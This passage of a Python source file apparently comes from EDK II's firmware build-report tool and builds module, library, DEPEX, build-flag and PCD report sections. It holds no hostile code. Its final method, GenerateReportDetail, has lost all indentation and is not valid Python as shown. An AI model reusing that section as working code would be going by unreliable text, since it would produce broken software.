        String = textwrap.fill(String, gLineMaxLength)
    File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
    """Format a PCD byte-array value string for report output.

    A value of the form "{0x01,0x02,...}" with at least 16 elements is
    treated as a byte array: every element is normalized to the 0xXX form
    and the elements are emitted in chunks of 16 per report line. All
    lines but the last end with ',' and the last line ends with '}'.

    Note: the original computed the chunk count with true division
    ('/' yields a float in Python 3) and used it as a loop bound; this
    version chunks with integer arithmetic only.

    @Value   The PCD value string to format
    @retval  (IsByteArray, ArrayList) - IsByteArray is True when Value was
             recognized and formatted as a byte array; ArrayList holds the
             formatted report lines (empty when IsByteArray is False).
    """
    SplitNum = 16
    IsByteArray = False
    ArrayList = []
    if Value.startswith('{') and Value.endswith('}'):
        Elements = Value[1:-1].split(',')
        IsByteArray = len(Elements) >= SplitNum
        if IsByteArray:
            # Normalize each element to exactly two uppercase hex digits.
            Elements = ['0x%02X' % int(Element.strip(), 16) for Element in Elements]
            for Start in range(0, len(Elements), SplitNum):
                Chunk = ','.join(Elements[Start:Start + SplitNum])
                if Start + SplitNum >= len(Elements):
                    # Final chunk closes the array.
                    ArrayList.append(Chunk + '}')
                else:
                    ArrayList.append(Chunk + ',')
    return IsByteArray, ArrayList
##
# Find all the header files that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# files the module might include with #include statements.
#
# @Source            The source file name
# @IncludePathList   The list of include paths to find the source file.
# @IncludeFiles      The dictionary of current found include files,
#                    updated in place: normalized lower-case path -> path.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
    # Close the source file deterministically instead of leaking the handle.
    # NOTE(review): 'open' is OpenLongFilePath here - assumed to return a
    # regular file object usable as a context manager.
    with open(Source) as SourceFile:
        FileContents = SourceFile.read()
    #
    # Find header files with pattern #include "XXX.h" or #include <XXX.h>
    #
    for Match in gIncludePattern.finditer(FileContents):
        FileName = Match.group(1).strip()
        # The directory of the including source is searched first.
        for Dir in [os.path.dirname(Source)] + IncludePathList:
            FullFileName = os.path.normpath(os.path.join(Dir, FileName))
            if os.path.exists(FullFileName):
                IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
                break
    #
    # Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
    #
    for Match in gIncludePattern2.finditer(FileContents):
        Key = Match.group(2)
        Type = Match.group(1)
        # Map the macro category to the conventional header location.
        if "ARCH_PROTOCOL" in Type:
            FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif "PROTOCOL" in Type:
            FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif "PPI" in Type:
            FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
        elif TAB_GUID in Type:
            FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
        else:
            continue
        for Dir in IncludePathList:
            FullFileName = os.path.normpath(os.path.join(Dir, FileName))
            if os.path.exists(FullFileName):
                IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
                break
## Split each line in file
#
# This method is used to split the lines in file to make the length of each
# line less than MaxLength.
#
# @param Content    The content of file
# @param MaxLength  The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
    NewContentList = []
    for Line in Content.split(TAB_LINE_BREAK):
        while len(Line.rstrip()) > MaxLength:
            # Prefer to break at the last space, '/' or '\' before the
            # limit; fall back to a hard break at MaxLength.
            LineBreakIndex = max(
                Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength),
                Line.rfind(TAB_SLASH, 0, MaxLength),
                Line.rfind(TAB_BACK_SLASH, 0, MaxLength),
            )
            if LineBreakIndex <= 0:
                LineBreakIndex = MaxLength
            NewContentList.append(Line[:LineBreakIndex])
            Line = Line[LineBreakIndex:]
        # NOTE: an empty remainder (including originally empty lines) is
        # dropped here, matching the original behavior.
        if Line:
            NewContentList.append(Line)
    # Build the result with a single join instead of quadratic '+=' concatenation.
    NewContent = ''.join(NewLine + TAB_LINE_BREAK for NewLine in NewContentList)
    return NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translates
# the readable GUID name and value.
#
class DepexParser(object):
    ##
    # Constructor function for class DepexParser
    #
    # This constructor function collects GUID values so that the readable
    # GUID name can be translated.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    #
    def __init__(self, Wa):
        self._GuidDb = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                # Protocols, PPIs and GUIDs all share one value -> name table.
                for Protocol in Package.Protocols:
                    GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
                    self._GuidDb[GuidValue.upper()] = Protocol
                for Ppi in Package.Ppis:
                    GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
                    self._GuidDb[GuidValue.upper()] = Ppi
                for Guid in Package.Guids:
                    GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
                    self._GuidDb[GuidValue.upper()] = Guid
            for Ma in Pa.ModuleAutoGenList:
                # A fixed VOID* PCD whose value is a 16-byte array may encode a GUID.
                for Pcd in Ma.FixedVoidTypePcds:
                    PcdValue = Ma.FixedVoidTypePcds[Pcd]
                    if len(PcdValue.split(',')) == 16:
                        GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
                        self._GuidDb[GuidValue.upper()] = Pcd
    ##
    # Parse the binary dependency expression files.
    #
    # This function parses the binary dependency expression file and
    # translates it to the instruction list.
    #
    # @param self            The object pointer
    # @param DepexFileName   The file name of binary dependency expression file.
    #
    def ParseDepexFile(self, DepexFileName):
        DepexStatement = []
        # Close the file deterministically instead of leaking the handle.
        with open(DepexFileName, "rb") as DepexFile:
            OpCode = DepexFile.read(1)
            while OpCode:
                Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
                if Statement in ["BEFORE", "AFTER", "PUSH"]:
                    # These opcodes carry a 16-byte GUID operand.
                    GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
                                struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
                    GuidString = self._GuidDb.get(GuidValue, GuidValue)
                    Statement = "%s %s" % (Statement, GuidString)
                DepexStatement.append(Statement)
                OpCode = DepexFile.read(1)
        return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
    ##
    # Constructor function for class LibraryReport
    #
    # This constructor function generates LibraryReport object for
    # a module.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.LibraryList = []
        if int(str(M.AutoGenVersion), 0) >= 0x00010005:
            self._EdkIIModule = True
        else:
            self._EdkIIModule = False
        for Lib in M.DependentLibraryList:
            LibInfPath = str(Lib)
            LibClassList = Lib.LibraryClass[0].LibraryClass
            LibConstructorList = Lib.ConstructorList
            LibDesstructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            # Initialize before the search: previously LibTime could be
            # unbound (no match on the first library -> UnboundLocalError)
            # or stale (value carried over from a previous library).
            LibTime = ''
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
    ##
    # Generate report for module library information
    #
    # This function generates report for the module library.
    # If the module is EDKII style one, the additional library class, library
    # constructor/destructor and dependency expression may also be reported.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        if len(self.LibraryList) > 0:
            FileWrite(File, gSubSectionStart)
            FileWrite(File, TAB_BRG_LIBRARY)
            FileWrite(File, gSubSectionSep)
            for LibraryItem in self.LibraryList:
                LibInfPath = LibraryItem[0]
                FileWrite(File, LibInfPath)
                #
                # Report library class, library constructor and destructor for
                # EDKII style module.
                #
                if self._EdkIIModule:
                    LibClass = LibraryItem[1]
                    EdkIILibInfo = ""
                    LibConstructor = " ".join(LibraryItem[2])
                    if LibConstructor:
                        EdkIILibInfo += " C = " + LibConstructor
                    LibDestructor = " ".join(LibraryItem[3])
                    if LibDestructor:
                        EdkIILibInfo += " D = " + LibDestructor
                    LibDepex = " ".join(LibraryItem[4])
                    if LibDepex:
                        EdkIILibInfo += " Depex = " + LibDepex
                    # An empty LibTime (no AutoGen match) simply omits the field.
                    if LibraryItem[5]:
                        EdkIILibInfo += " Time = " + LibraryItem[5]
                    if EdkIILibInfo:
                        FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
                    else:
                        FileWrite(File, "{%s}" % LibClass)
            FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
    ##
    # Constructor function for class DepexReport
    #
    # This constructor function generates DepexReport object for
    # a module. If the module source contains the DXS file (usually EDK
    # style module), it uses the dependency in DXS file; otherwise,
    # it uses the dependency expression from its own INF [Depex] section
    # and then merges with the ones from its dependent library INF.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        self.Depex = ""
        self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
        ModuleType = M.ModuleType
        if not ModuleType:
            ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
        # Core and application module types carry no DEPEX section.
        if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
            return
        for Source in M.SourceFileList:
            if os.path.splitext(Source.Path)[1].lower() == ".dxs":
                # Close the DXS file promptly instead of leaking the handle.
                with open(Source.Path) as DxsFile:
                    Match = gDxsDependencyPattern.search(DxsFile.read())
                if Match:
                    self.Depex = Match.group(1).strip()
                    self.Source = "DXS"
                    break
        else:
            # for-else: no DXS dependency found, merge INF [Depex] with the
            # dependency expressions of the dependent libraries.
            self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
            self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
            if not self.ModuleDepex:
                self.ModuleDepex = "(None)"
            LibDepexList = []
            for Lib in M.DependentLibraryList:
                LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
                if LibDepex != "":
                    LibDepexList.append("(" + LibDepex + ")")
            self.LibraryDepex = " AND ".join(LibDepexList)
            if not self.LibraryDepex:
                self.LibraryDepex = "(None)"
            self.Source = "INF"
    ##
    # Generate report for module dependency expression information
    #
    # This function generates report for the module dependency expression.
    #
    # @param self             The object pointer
    # @param File             The file object for report
    # @param GlobalDepexParser The platform global Dependency expression parser object
    #
    def GenerateReport(self, File, GlobalDepexParser):
        if not self.Depex:
            return
        FileWrite(File, gSubSectionStart)
        if os.path.isfile(self._DepexFileName):
            try:
                DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
                FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
                for DepexStatement in DepexStatements:
                    FileWrite(File, " %s" % DepexStatement)
                FileWrite(File, gSubSectionSep)
            except Exception:
                # Narrowed from a bare 'except:' so Ctrl-C still propagates;
                # a corrupted depex file is reported but not fatal.
                EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
        FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
        if self.Source == "INF":
            FileWrite(File, self.Depex, True)
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
            FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
        else:
            FileWrite(File, self.Depex)
        FileWrite(File, gSubSectionEnd)
##
# Reports module build flags information
#
# This class reports the module build flags subsection in the build report
# file: the tool chain tag and the flags of every tool relevant to the
# module's source file types.
#
class BuildFlagsReport(object):
    ##
    # Constructor function for class BuildFlagsReport
    #
    # Determines which tools are relevant from the extensions of the
    # module's source files, then records the tool chain tag and each
    # relevant tool's FLAGS setting.
    #
    # @param self            The object pointer
    # @param M               Module context information
    #
    def __init__(self, M):
        # Map each source extension to the tools whose flags matter for it,
        # so irrelevant flags can be filtered out of the report. Tuple
        # order matches the original insertion order of the tools.
        ExtToolMap = {
            '.c'    : ('CC',),
            '.cc'   : ('CC',),
            '.cpp'  : ('CC',),
            '.s'    : ('PP', 'ASM'),
            '.asm'  : ('PP', 'ASM'),
            '.vfr'  : ('VFRPP', 'VFR'),
            '.dxs'  : ('APP', 'CC'),
            '.asl'  : ('ASLPP', 'ASL'),
            '.aslc' : ('ASLCC', 'ASLDLINK', 'CC'),
            '.asm16': ('ASMLINK', 'SLINK', 'DLINK'),
        }
        BuildOptions = {}
        for SourceFile in M.SourceFileList:
            Extension = os.path.splitext(SourceFile.File)[1].lower()
            for Tool in ExtToolMap.get(Extension, ()):
                BuildOptions[Tool] = 1
        #
        # Save module build flags.
        #
        self.ToolChainTag = M.ToolChain
        self.BuildFlags = {}
        for Tool in BuildOptions:
            self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
    ##
    # Generate report for module build flags information
    #
    # Writes the build flags subsection: tool chain tag followed by one
    # wrapped "TOOL_FLAGS = value" entry per relevant tool.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    #
    def GenerateReport(self, File):
        FileWrite(File, gSubSectionStart)
        FileWrite(File, "Build Flags")
        FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
        for Tool in self.BuildFlags:
            FileWrite(File, gSubSectionSep)
            FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
        FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
    ##
    # Constructor function for class ModuleReport
    #
    # This constructor function generates ModuleReport object for
    # a separate module in a platform build.
    #
    # @param self            The object pointer
    # @param M               Module context information
    # @param ReportType      The kind of report items in the final report file
    #
    def __init__(self, M, ReportType):
        self.ModuleName = M.Module.BaseName
        self.ModuleInfPath = M.MetaFile.File
        self.FileGuid = M.Guid
        self.Size = 0
        self.BuildTimeStamp = None
        self.Hash = 0
        self.DriverType = ""
        if not M.IsLibrary:
            ModuleType = M.ModuleType
            if not ModuleType:
                ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
            #
            # If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
            #
            if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
                PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
                if int(PiSpec, 0) >= 0x0001000A:
                    ModuleType = "SMM_DRIVER"
            self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
        self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
        self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
        self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
        self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
        self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
        self.BuildTime = M.BuildTime
        self._BuildDir = M.BuildDir
        self.ModulePcdSet = {}
        if "PCD" in ReportType:
            #
            # Collect all module used PCD set: module INF referenced directly or indirectly.
            # It also saves module INF default values of them in case they exist.
            #
            for Pcd in list(M.ModulePcdList) + list(M.LibraryPcdList):
                self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
        self.LibraryReport = None
        if "LIBRARY" in ReportType:
            self.LibraryReport = LibraryReport(M)
        self.DepexReport = None
        if "DEPEX" in ReportType:
            self.DepexReport = DepexReport(M)
        if "BUILD_FLAGS" in ReportType:
            self.BuildFlagsReport = BuildFlagsReport(M)
    ##
    # Generate report for module information
    #
    # This function generates report for separate module expression
    # in a platform build.
    #
    # @param self                   The object pointer
    # @param File                   The file object for report
    # @param GlobalPcdReport        The platform global PCD report object
    # @param GlobalPredictionReport The platform global Prediction report object
    # @param GlobalDepexParser      The platform global Dependency expression parser object
    # @param ReportType             The kind of report items in the final report file
    #
    def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
        FileWrite(File, gSectionStart)
        FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
        if os.path.isfile(FwReportFileName):
            try:
                # Close the intermediate report file deterministically.
                with open(FwReportFileName, 'r') as FwReportFile:
                    FileContents = FwReportFile.read()
                Match = gModuleSizePattern.search(FileContents)
                if Match:
                    self.Size = int(Match.group(1))
                Match = gTimeStampPattern.search(FileContents)
                if Match:
                    self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
            except IOError:
                EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
        if "HASH" in ReportType:
            OutputDir = os.path.join(self._BuildDir, "OUTPUT")
            DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
            if os.path.isfile(DefaultEFIfile):
                Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
                # rebase the efi image since its base address may not zero
                cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
                try:
                    PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
                except Exception as X:
                    EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
                EndOfProcedure = threading.Event()
                EndOfProcedure.clear()
                if PopenObject.stderr:
                    # Drain stderr on a separate thread so the child process
                    # cannot block on a full pipe buffer.
                    StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
                    StdErrThread.setName("STDERR-Redirector")
                    StdErrThread.setDaemon(False)
                    StdErrThread.start()
                # waiting for program exit
                PopenObject.wait()
                if PopenObject.stderr:
                    StdErrThread.join()
                if PopenObject.returncode != 0:
                    EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
                if os.path.isfile(Tempfile):
                    # hashlib's update() returns None, so the original
                    # "if self.Hash.update(buf): self.Hash = self.Hash.update(buf)"
                    # branch was dead code; hash the rebased image in one
                    # pass and close the temp file deterministically.
                    with open(Tempfile, 'rb') as TempFileObj:
                        self.Hash = hashlib.sha1(TempFileObj.read()).hexdigest()
                    os.remove(Tempfile)
        FileWrite(File, "Module Summary")
        FileWrite(File, "Module Name: %s" % self.ModuleName)
        FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
        FileWrite(File, "File GUID: %s" % self.FileGuid)
        if self.Size:
            FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
        if self.Hash:
            FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
        if self.BuildTimeStamp:
            FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
        if self.BuildTime:
            FileWrite(File, "Module Build Time: %s" % self.BuildTime)
        if self.DriverType:
            FileWrite(File, "Driver Type: %s" % self.DriverType)
        if self.UefiSpecVersion:
            FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
        if self.PiSpecVersion:
            FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
        if self.PciDeviceId:
            FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
        if self.PciVendorId:
            FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
        if self.PciClassCode:
            FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
        FileWrite(File, gSectionSep)
        if "PCD" in ReportType:
            GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
        if "LIBRARY" in ReportType:
            self.LibraryReport.GenerateReport(File)
        if "DEPEX" in ReportType:
            self.DepexReport.GenerateReport(File, GlobalDepexParser)
        if "BUILD_FLAGS" in ReportType:
            self.BuildFlagsReport.GenerateReport(File)
        if "FIXED_ADDRESS" in ReportType and self.FileGuid:
            GlobalPredictionReport.GenerateReport(File, self.FileGuid)
        FileWrite(File, gSectionEnd)
def ReadMessage(From, To, ExitFlag):
    """Pump lines from a byte stream to a callback until EOF or exit request.

    Reads one line at a time from From, strips the line terminator, decodes
    it as UTF-8 (ignoring errors) and passes it to the callable To. Stops
    at end-of-stream (empty read) or when ExitFlag is set after a line has
    been delivered.

    @param From      Readable binary stream (e.g. a subprocess pipe)
    @param To        Callable invoked with each decoded line
    @param ExitFlag  threading.Event checked after each delivered line
    """
    while True:
        # read one line a time
        Line = From.readline()
        # An empty bytes object means end-of-stream ("end").
        if not Line:
            break
        To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
        # is_set() is the non-deprecated spelling of Event.isSet().
        if ExitFlag.is_set():
            break
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
    ##
    # Constructor function for class PcdReport
    #
    # This constructor function generates PcdReport object a platform build.
    # It collects the whole PCD database from platform DSC files, platform
    # flash description file and package DEC files.
    #
    # @param self            The object pointer
    # @param Wa              Workspace context information
    #
    def __init__(self, Wa):
        # PCDs grouped by token space GUID C name, then by PCD type.
        self.AllPcds = {}
        # PCDs declared in DSC/FDF but referenced by no module.
        self.UnusedPcds = {}
        # PCDs referenced in conditional directives.
        self.ConditionalPcds = {}
        # Longest token C name seen; used downstream for column alignment.
        self.MaxLen = 0
        self.Arch = None
        if Wa.FdfProfile:
            self.FdfPcdSet = Wa.FdfProfile.PcdDict
        else:
            self.FdfPcdSet = {}
        # Single default-store / single-SKU flags simplify report layout.
        self.DefaultStoreSingle = True
        self.SkuSingle = True
        if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
            self.DefaultStoreSingle = False
        if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
            self.SkuSingle = False
        self.ModulePcdOverride = {}
        for Pa in Wa.AutoGenObjectList:
            # NOTE(review): self.Arch ends up as the arch of the LAST
            # AutoGen object - presumably single-arch per report; confirm.
            self.Arch = Pa.Arch
            #
            # Collect all platform referenced PCDs and grouped them by PCD token space
            # GUID C Names
            #
            for Pcd in Pa.AllPcdList:
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            #
            # Collect the PCD defined in DSC/FDF file, but not used in module
            #
            UnusedPcdFullList = []
            for item in Pa.Platform.Pcds:
                Pcd = Pa.Platform.Pcds[item]
                if not Pcd.Type:
                    # check the Pcd in FDF file, whether it is used in module first
                    for T in PCD_TYPE_LIST:
                        PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(T, [])
                        if Pcd in PcdList:
                            Pcd.Type = T
                            break
                if not Pcd.Type:
                    # Still untyped: fall back to the type declared in any
                    # package DEC file (also backfilling DatumType).
                    PcdTypeFlag = False
                    for package in Pa.PackageList:
                        for T in PCD_TYPE_LIST:
                            if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T) in package.Pcds:
                                Pcd.Type = T
                                PcdTypeFlag = True
                                if not Pcd.DatumType:
                                    Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, T)].DatumType
                                break
                        if PcdTypeFlag:
                            break
                if not Pcd.DatumType:
                    PcdType = Pcd.Type
                    # Try to remove Hii and Vpd suffix
                    if PcdType.startswith(TAB_PCDS_DYNAMIC_EX):
                        PcdType = TAB_PCDS_DYNAMIC_EX
                    elif PcdType.startswith(TAB_PCDS_DYNAMIC):
                        PcdType = TAB_PCDS_DYNAMIC
                    for package in Pa.PackageList:
                        if (Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType) in package.Pcds:
                            Pcd.DatumType = package.Pcds[(Pcd.TokenCName, Pcd.TokenSpaceGuidCName, PcdType)].DatumType
                            break
                PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                UnusedPcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd in UnusedPcdList:
                    UnusedPcdList.remove(Pcd)
                if Pcd not in PcdList and Pcd not in UnusedPcdFullList:
                    UnusedPcdFullList.append(Pcd)
                if len(Pcd.TokenCName) > self.MaxLen:
                    self.MaxLen = len(Pcd.TokenCName)
            if GlobalData.gConditionalPcds:
                # Record PCDs referenced by build conditional directives
                # (entries have the form "TokenSpaceGuid.TokenName").
                for PcdItem in GlobalData.gConditionalPcds:
                    if '.' in PcdItem:
                        (TokenSpaceGuidCName, TokenCName) = PcdItem.split('.')
                        if (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                            Pcd = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)]
                            PcdList = self.ConditionalPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                            if Pcd not in PcdList:
                                PcdList.append(Pcd)
            UnusedPcdList = []
            if UnusedPcdFullList:
                # A PCD used in a conditional directive is not "unused".
                for Pcd in UnusedPcdFullList:
                    if Pcd.TokenSpaceGuidCName + '.' + Pcd.TokenCName in GlobalData.gConditionalPcds:
                        continue
                    UnusedPcdList.append(Pcd)
            for Pcd in UnusedPcdList:
                PcdList = self.UnusedPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
                if Pcd not in PcdList:
                    PcdList.append(Pcd)
            for Module in Pa.Platform.Modules.values():
                #
                # Collect module override PCDs
                #
                for ModulePcd in list(Module.M.ModulePcdList) + list(Module.M.LibraryPcdList):
                    TokenCName = ModulePcd.TokenCName
                    TokenSpaceGuid = ModulePcd.TokenSpaceGuidCName
                    ModuleDefault = ModulePcd.DefaultValue
                    ModulePath = os.path.basename(Module.M.MetaFile.File)
                    self.ModulePcdOverride.setdefault((TokenCName, TokenSpaceGuid), {})[ModulePath] = ModuleDefault
        #
        # Collect PCD DEC default value.
        #
        self.DecPcdDefault = {}
        self._GuidDict = {}
        for Pa in Wa.AutoGenObjectList:
            for Package in Pa.PackageList:
                Guids = Package.Guids
                self._GuidDict.update(Guids)
                for (TokenCName, TokenSpaceGuidCName, DecType) in Package.Pcds:
                    DecDefaultValue = Package.Pcds[TokenCName, TokenSpaceGuidCName, DecType].DefaultValue
                    # setdefault: the first package declaring the PCD wins.
                    self.DecPcdDefault.setdefault((TokenCName, TokenSpaceGuidCName, DecType), DecDefaultValue)
        #
        # Collect PCDs defined in DSC common section
        #
        self.DscPcdDefault = {}
        for Pa in Wa.AutoGenObjectList:
            for (TokenCName, TokenSpaceGuidCName) in Pa.Platform.Pcds:
                DscDefaultValue = Pa.Platform.Pcds[(TokenCName, TokenSpaceGuidCName)].DscDefaultValue
                if DscDefaultValue:
                    self.DscPcdDefault[(TokenCName, TokenSpaceGuidCName)] = DscDefaultValue
    ## Generate the PCD report sections.
    #
    # For a platform-level report (ModulePcdSet is falsy) the conditional
    # directive section (subtype 1) and the unused-PCD section (subtype 2)
    # are emitted first when they have content, followed by the main PCD
    # report. For a module-level report only the module PCD subsection is
    # emitted.
    #
    # @param self            The object pointer
    # @param File            The file object for report
    # @param ModulePcdSet    Set of all PCDs referenced by module, or None
    #                        for the platform PCD report
    #
    def GenerateReport(self, File, ModulePcdSet):
        if not ModulePcdSet:
            if self.ConditionalPcds:
                self.GenerateReportDetail(File, ModulePcdSet, 1)
            if self.UnusedPcds:
                # Emit the unused-PCD section only if at least one type
                # bucket actually contains a PCD.
                IsEmpty = True
                for Token in self.UnusedPcds:
                    TokenDict = self.UnusedPcds[Token]
                    for Type in TokenDict:
                        if TokenDict[Type]:
                            IsEmpty = False
                            break
                    if not IsEmpty:
                        break
                if not IsEmpty:
                    self.GenerateReportDetail(File, ModulePcdSet, 2)
        self.GenerateReportDetail(File, ModulePcdSet)
##
# Generate report for PCD information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param ModulePcdSet Set of all PCDs referenced by module or None for
# platform PCD report
# @param ReportySubType 0 means platform/module PCD report, 1 means Conditional
# directives section report, 2 means Unused Pcds section report
# @param DscOverridePcds Module DSC override PCDs set
#
def GenerateReportDetail(self, File, ModulePcdSet, ReportSubType = 0):
PcdDict = self.AllPcds
if ReportSubType == 1:
PcdDict = self.ConditionalPcds
elif ReportSubType == 2:
PcdDict = self.UnusedPcds
if not ModulePcdSet:
FileWrite(File, gSectionStart)
if ReportSubType == 1:
FileWrite(File, "Conditional Directives used by the build system")
elif ReportSubType == 2:
FileWrite(File, "PCDs not used by modules or in conditional directives")
else:
FileWrite(File, "Platform Configuration Database Report")
FileWrite(File, " *B - PCD override in the build option")
FileWrite(File, " *P - Platform scoped PCD override in DSC file")
FileWrite(File, " *F - Platform scoped PCD override in FDF file")
if not ReportSubType:
FileWrite(File, " *M - Module scoped PCD override")
FileWrite(File, gSectionSep)
else:
if not ReportSubType and ModulePcdSet:
#
# For module PCD sub-section
#
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_PCD)
FileWrite(File, gSubSectionSep)
AllPcdDict = {}
for Key in PcdDict:
AllPcdDict[Key] = {}
for Type in PcdDict[Key]:
for Pcd in PcdDict[Key][Type]:
AllPcdDict[Key][(Pcd.TokenCName, Type)] = Pcd
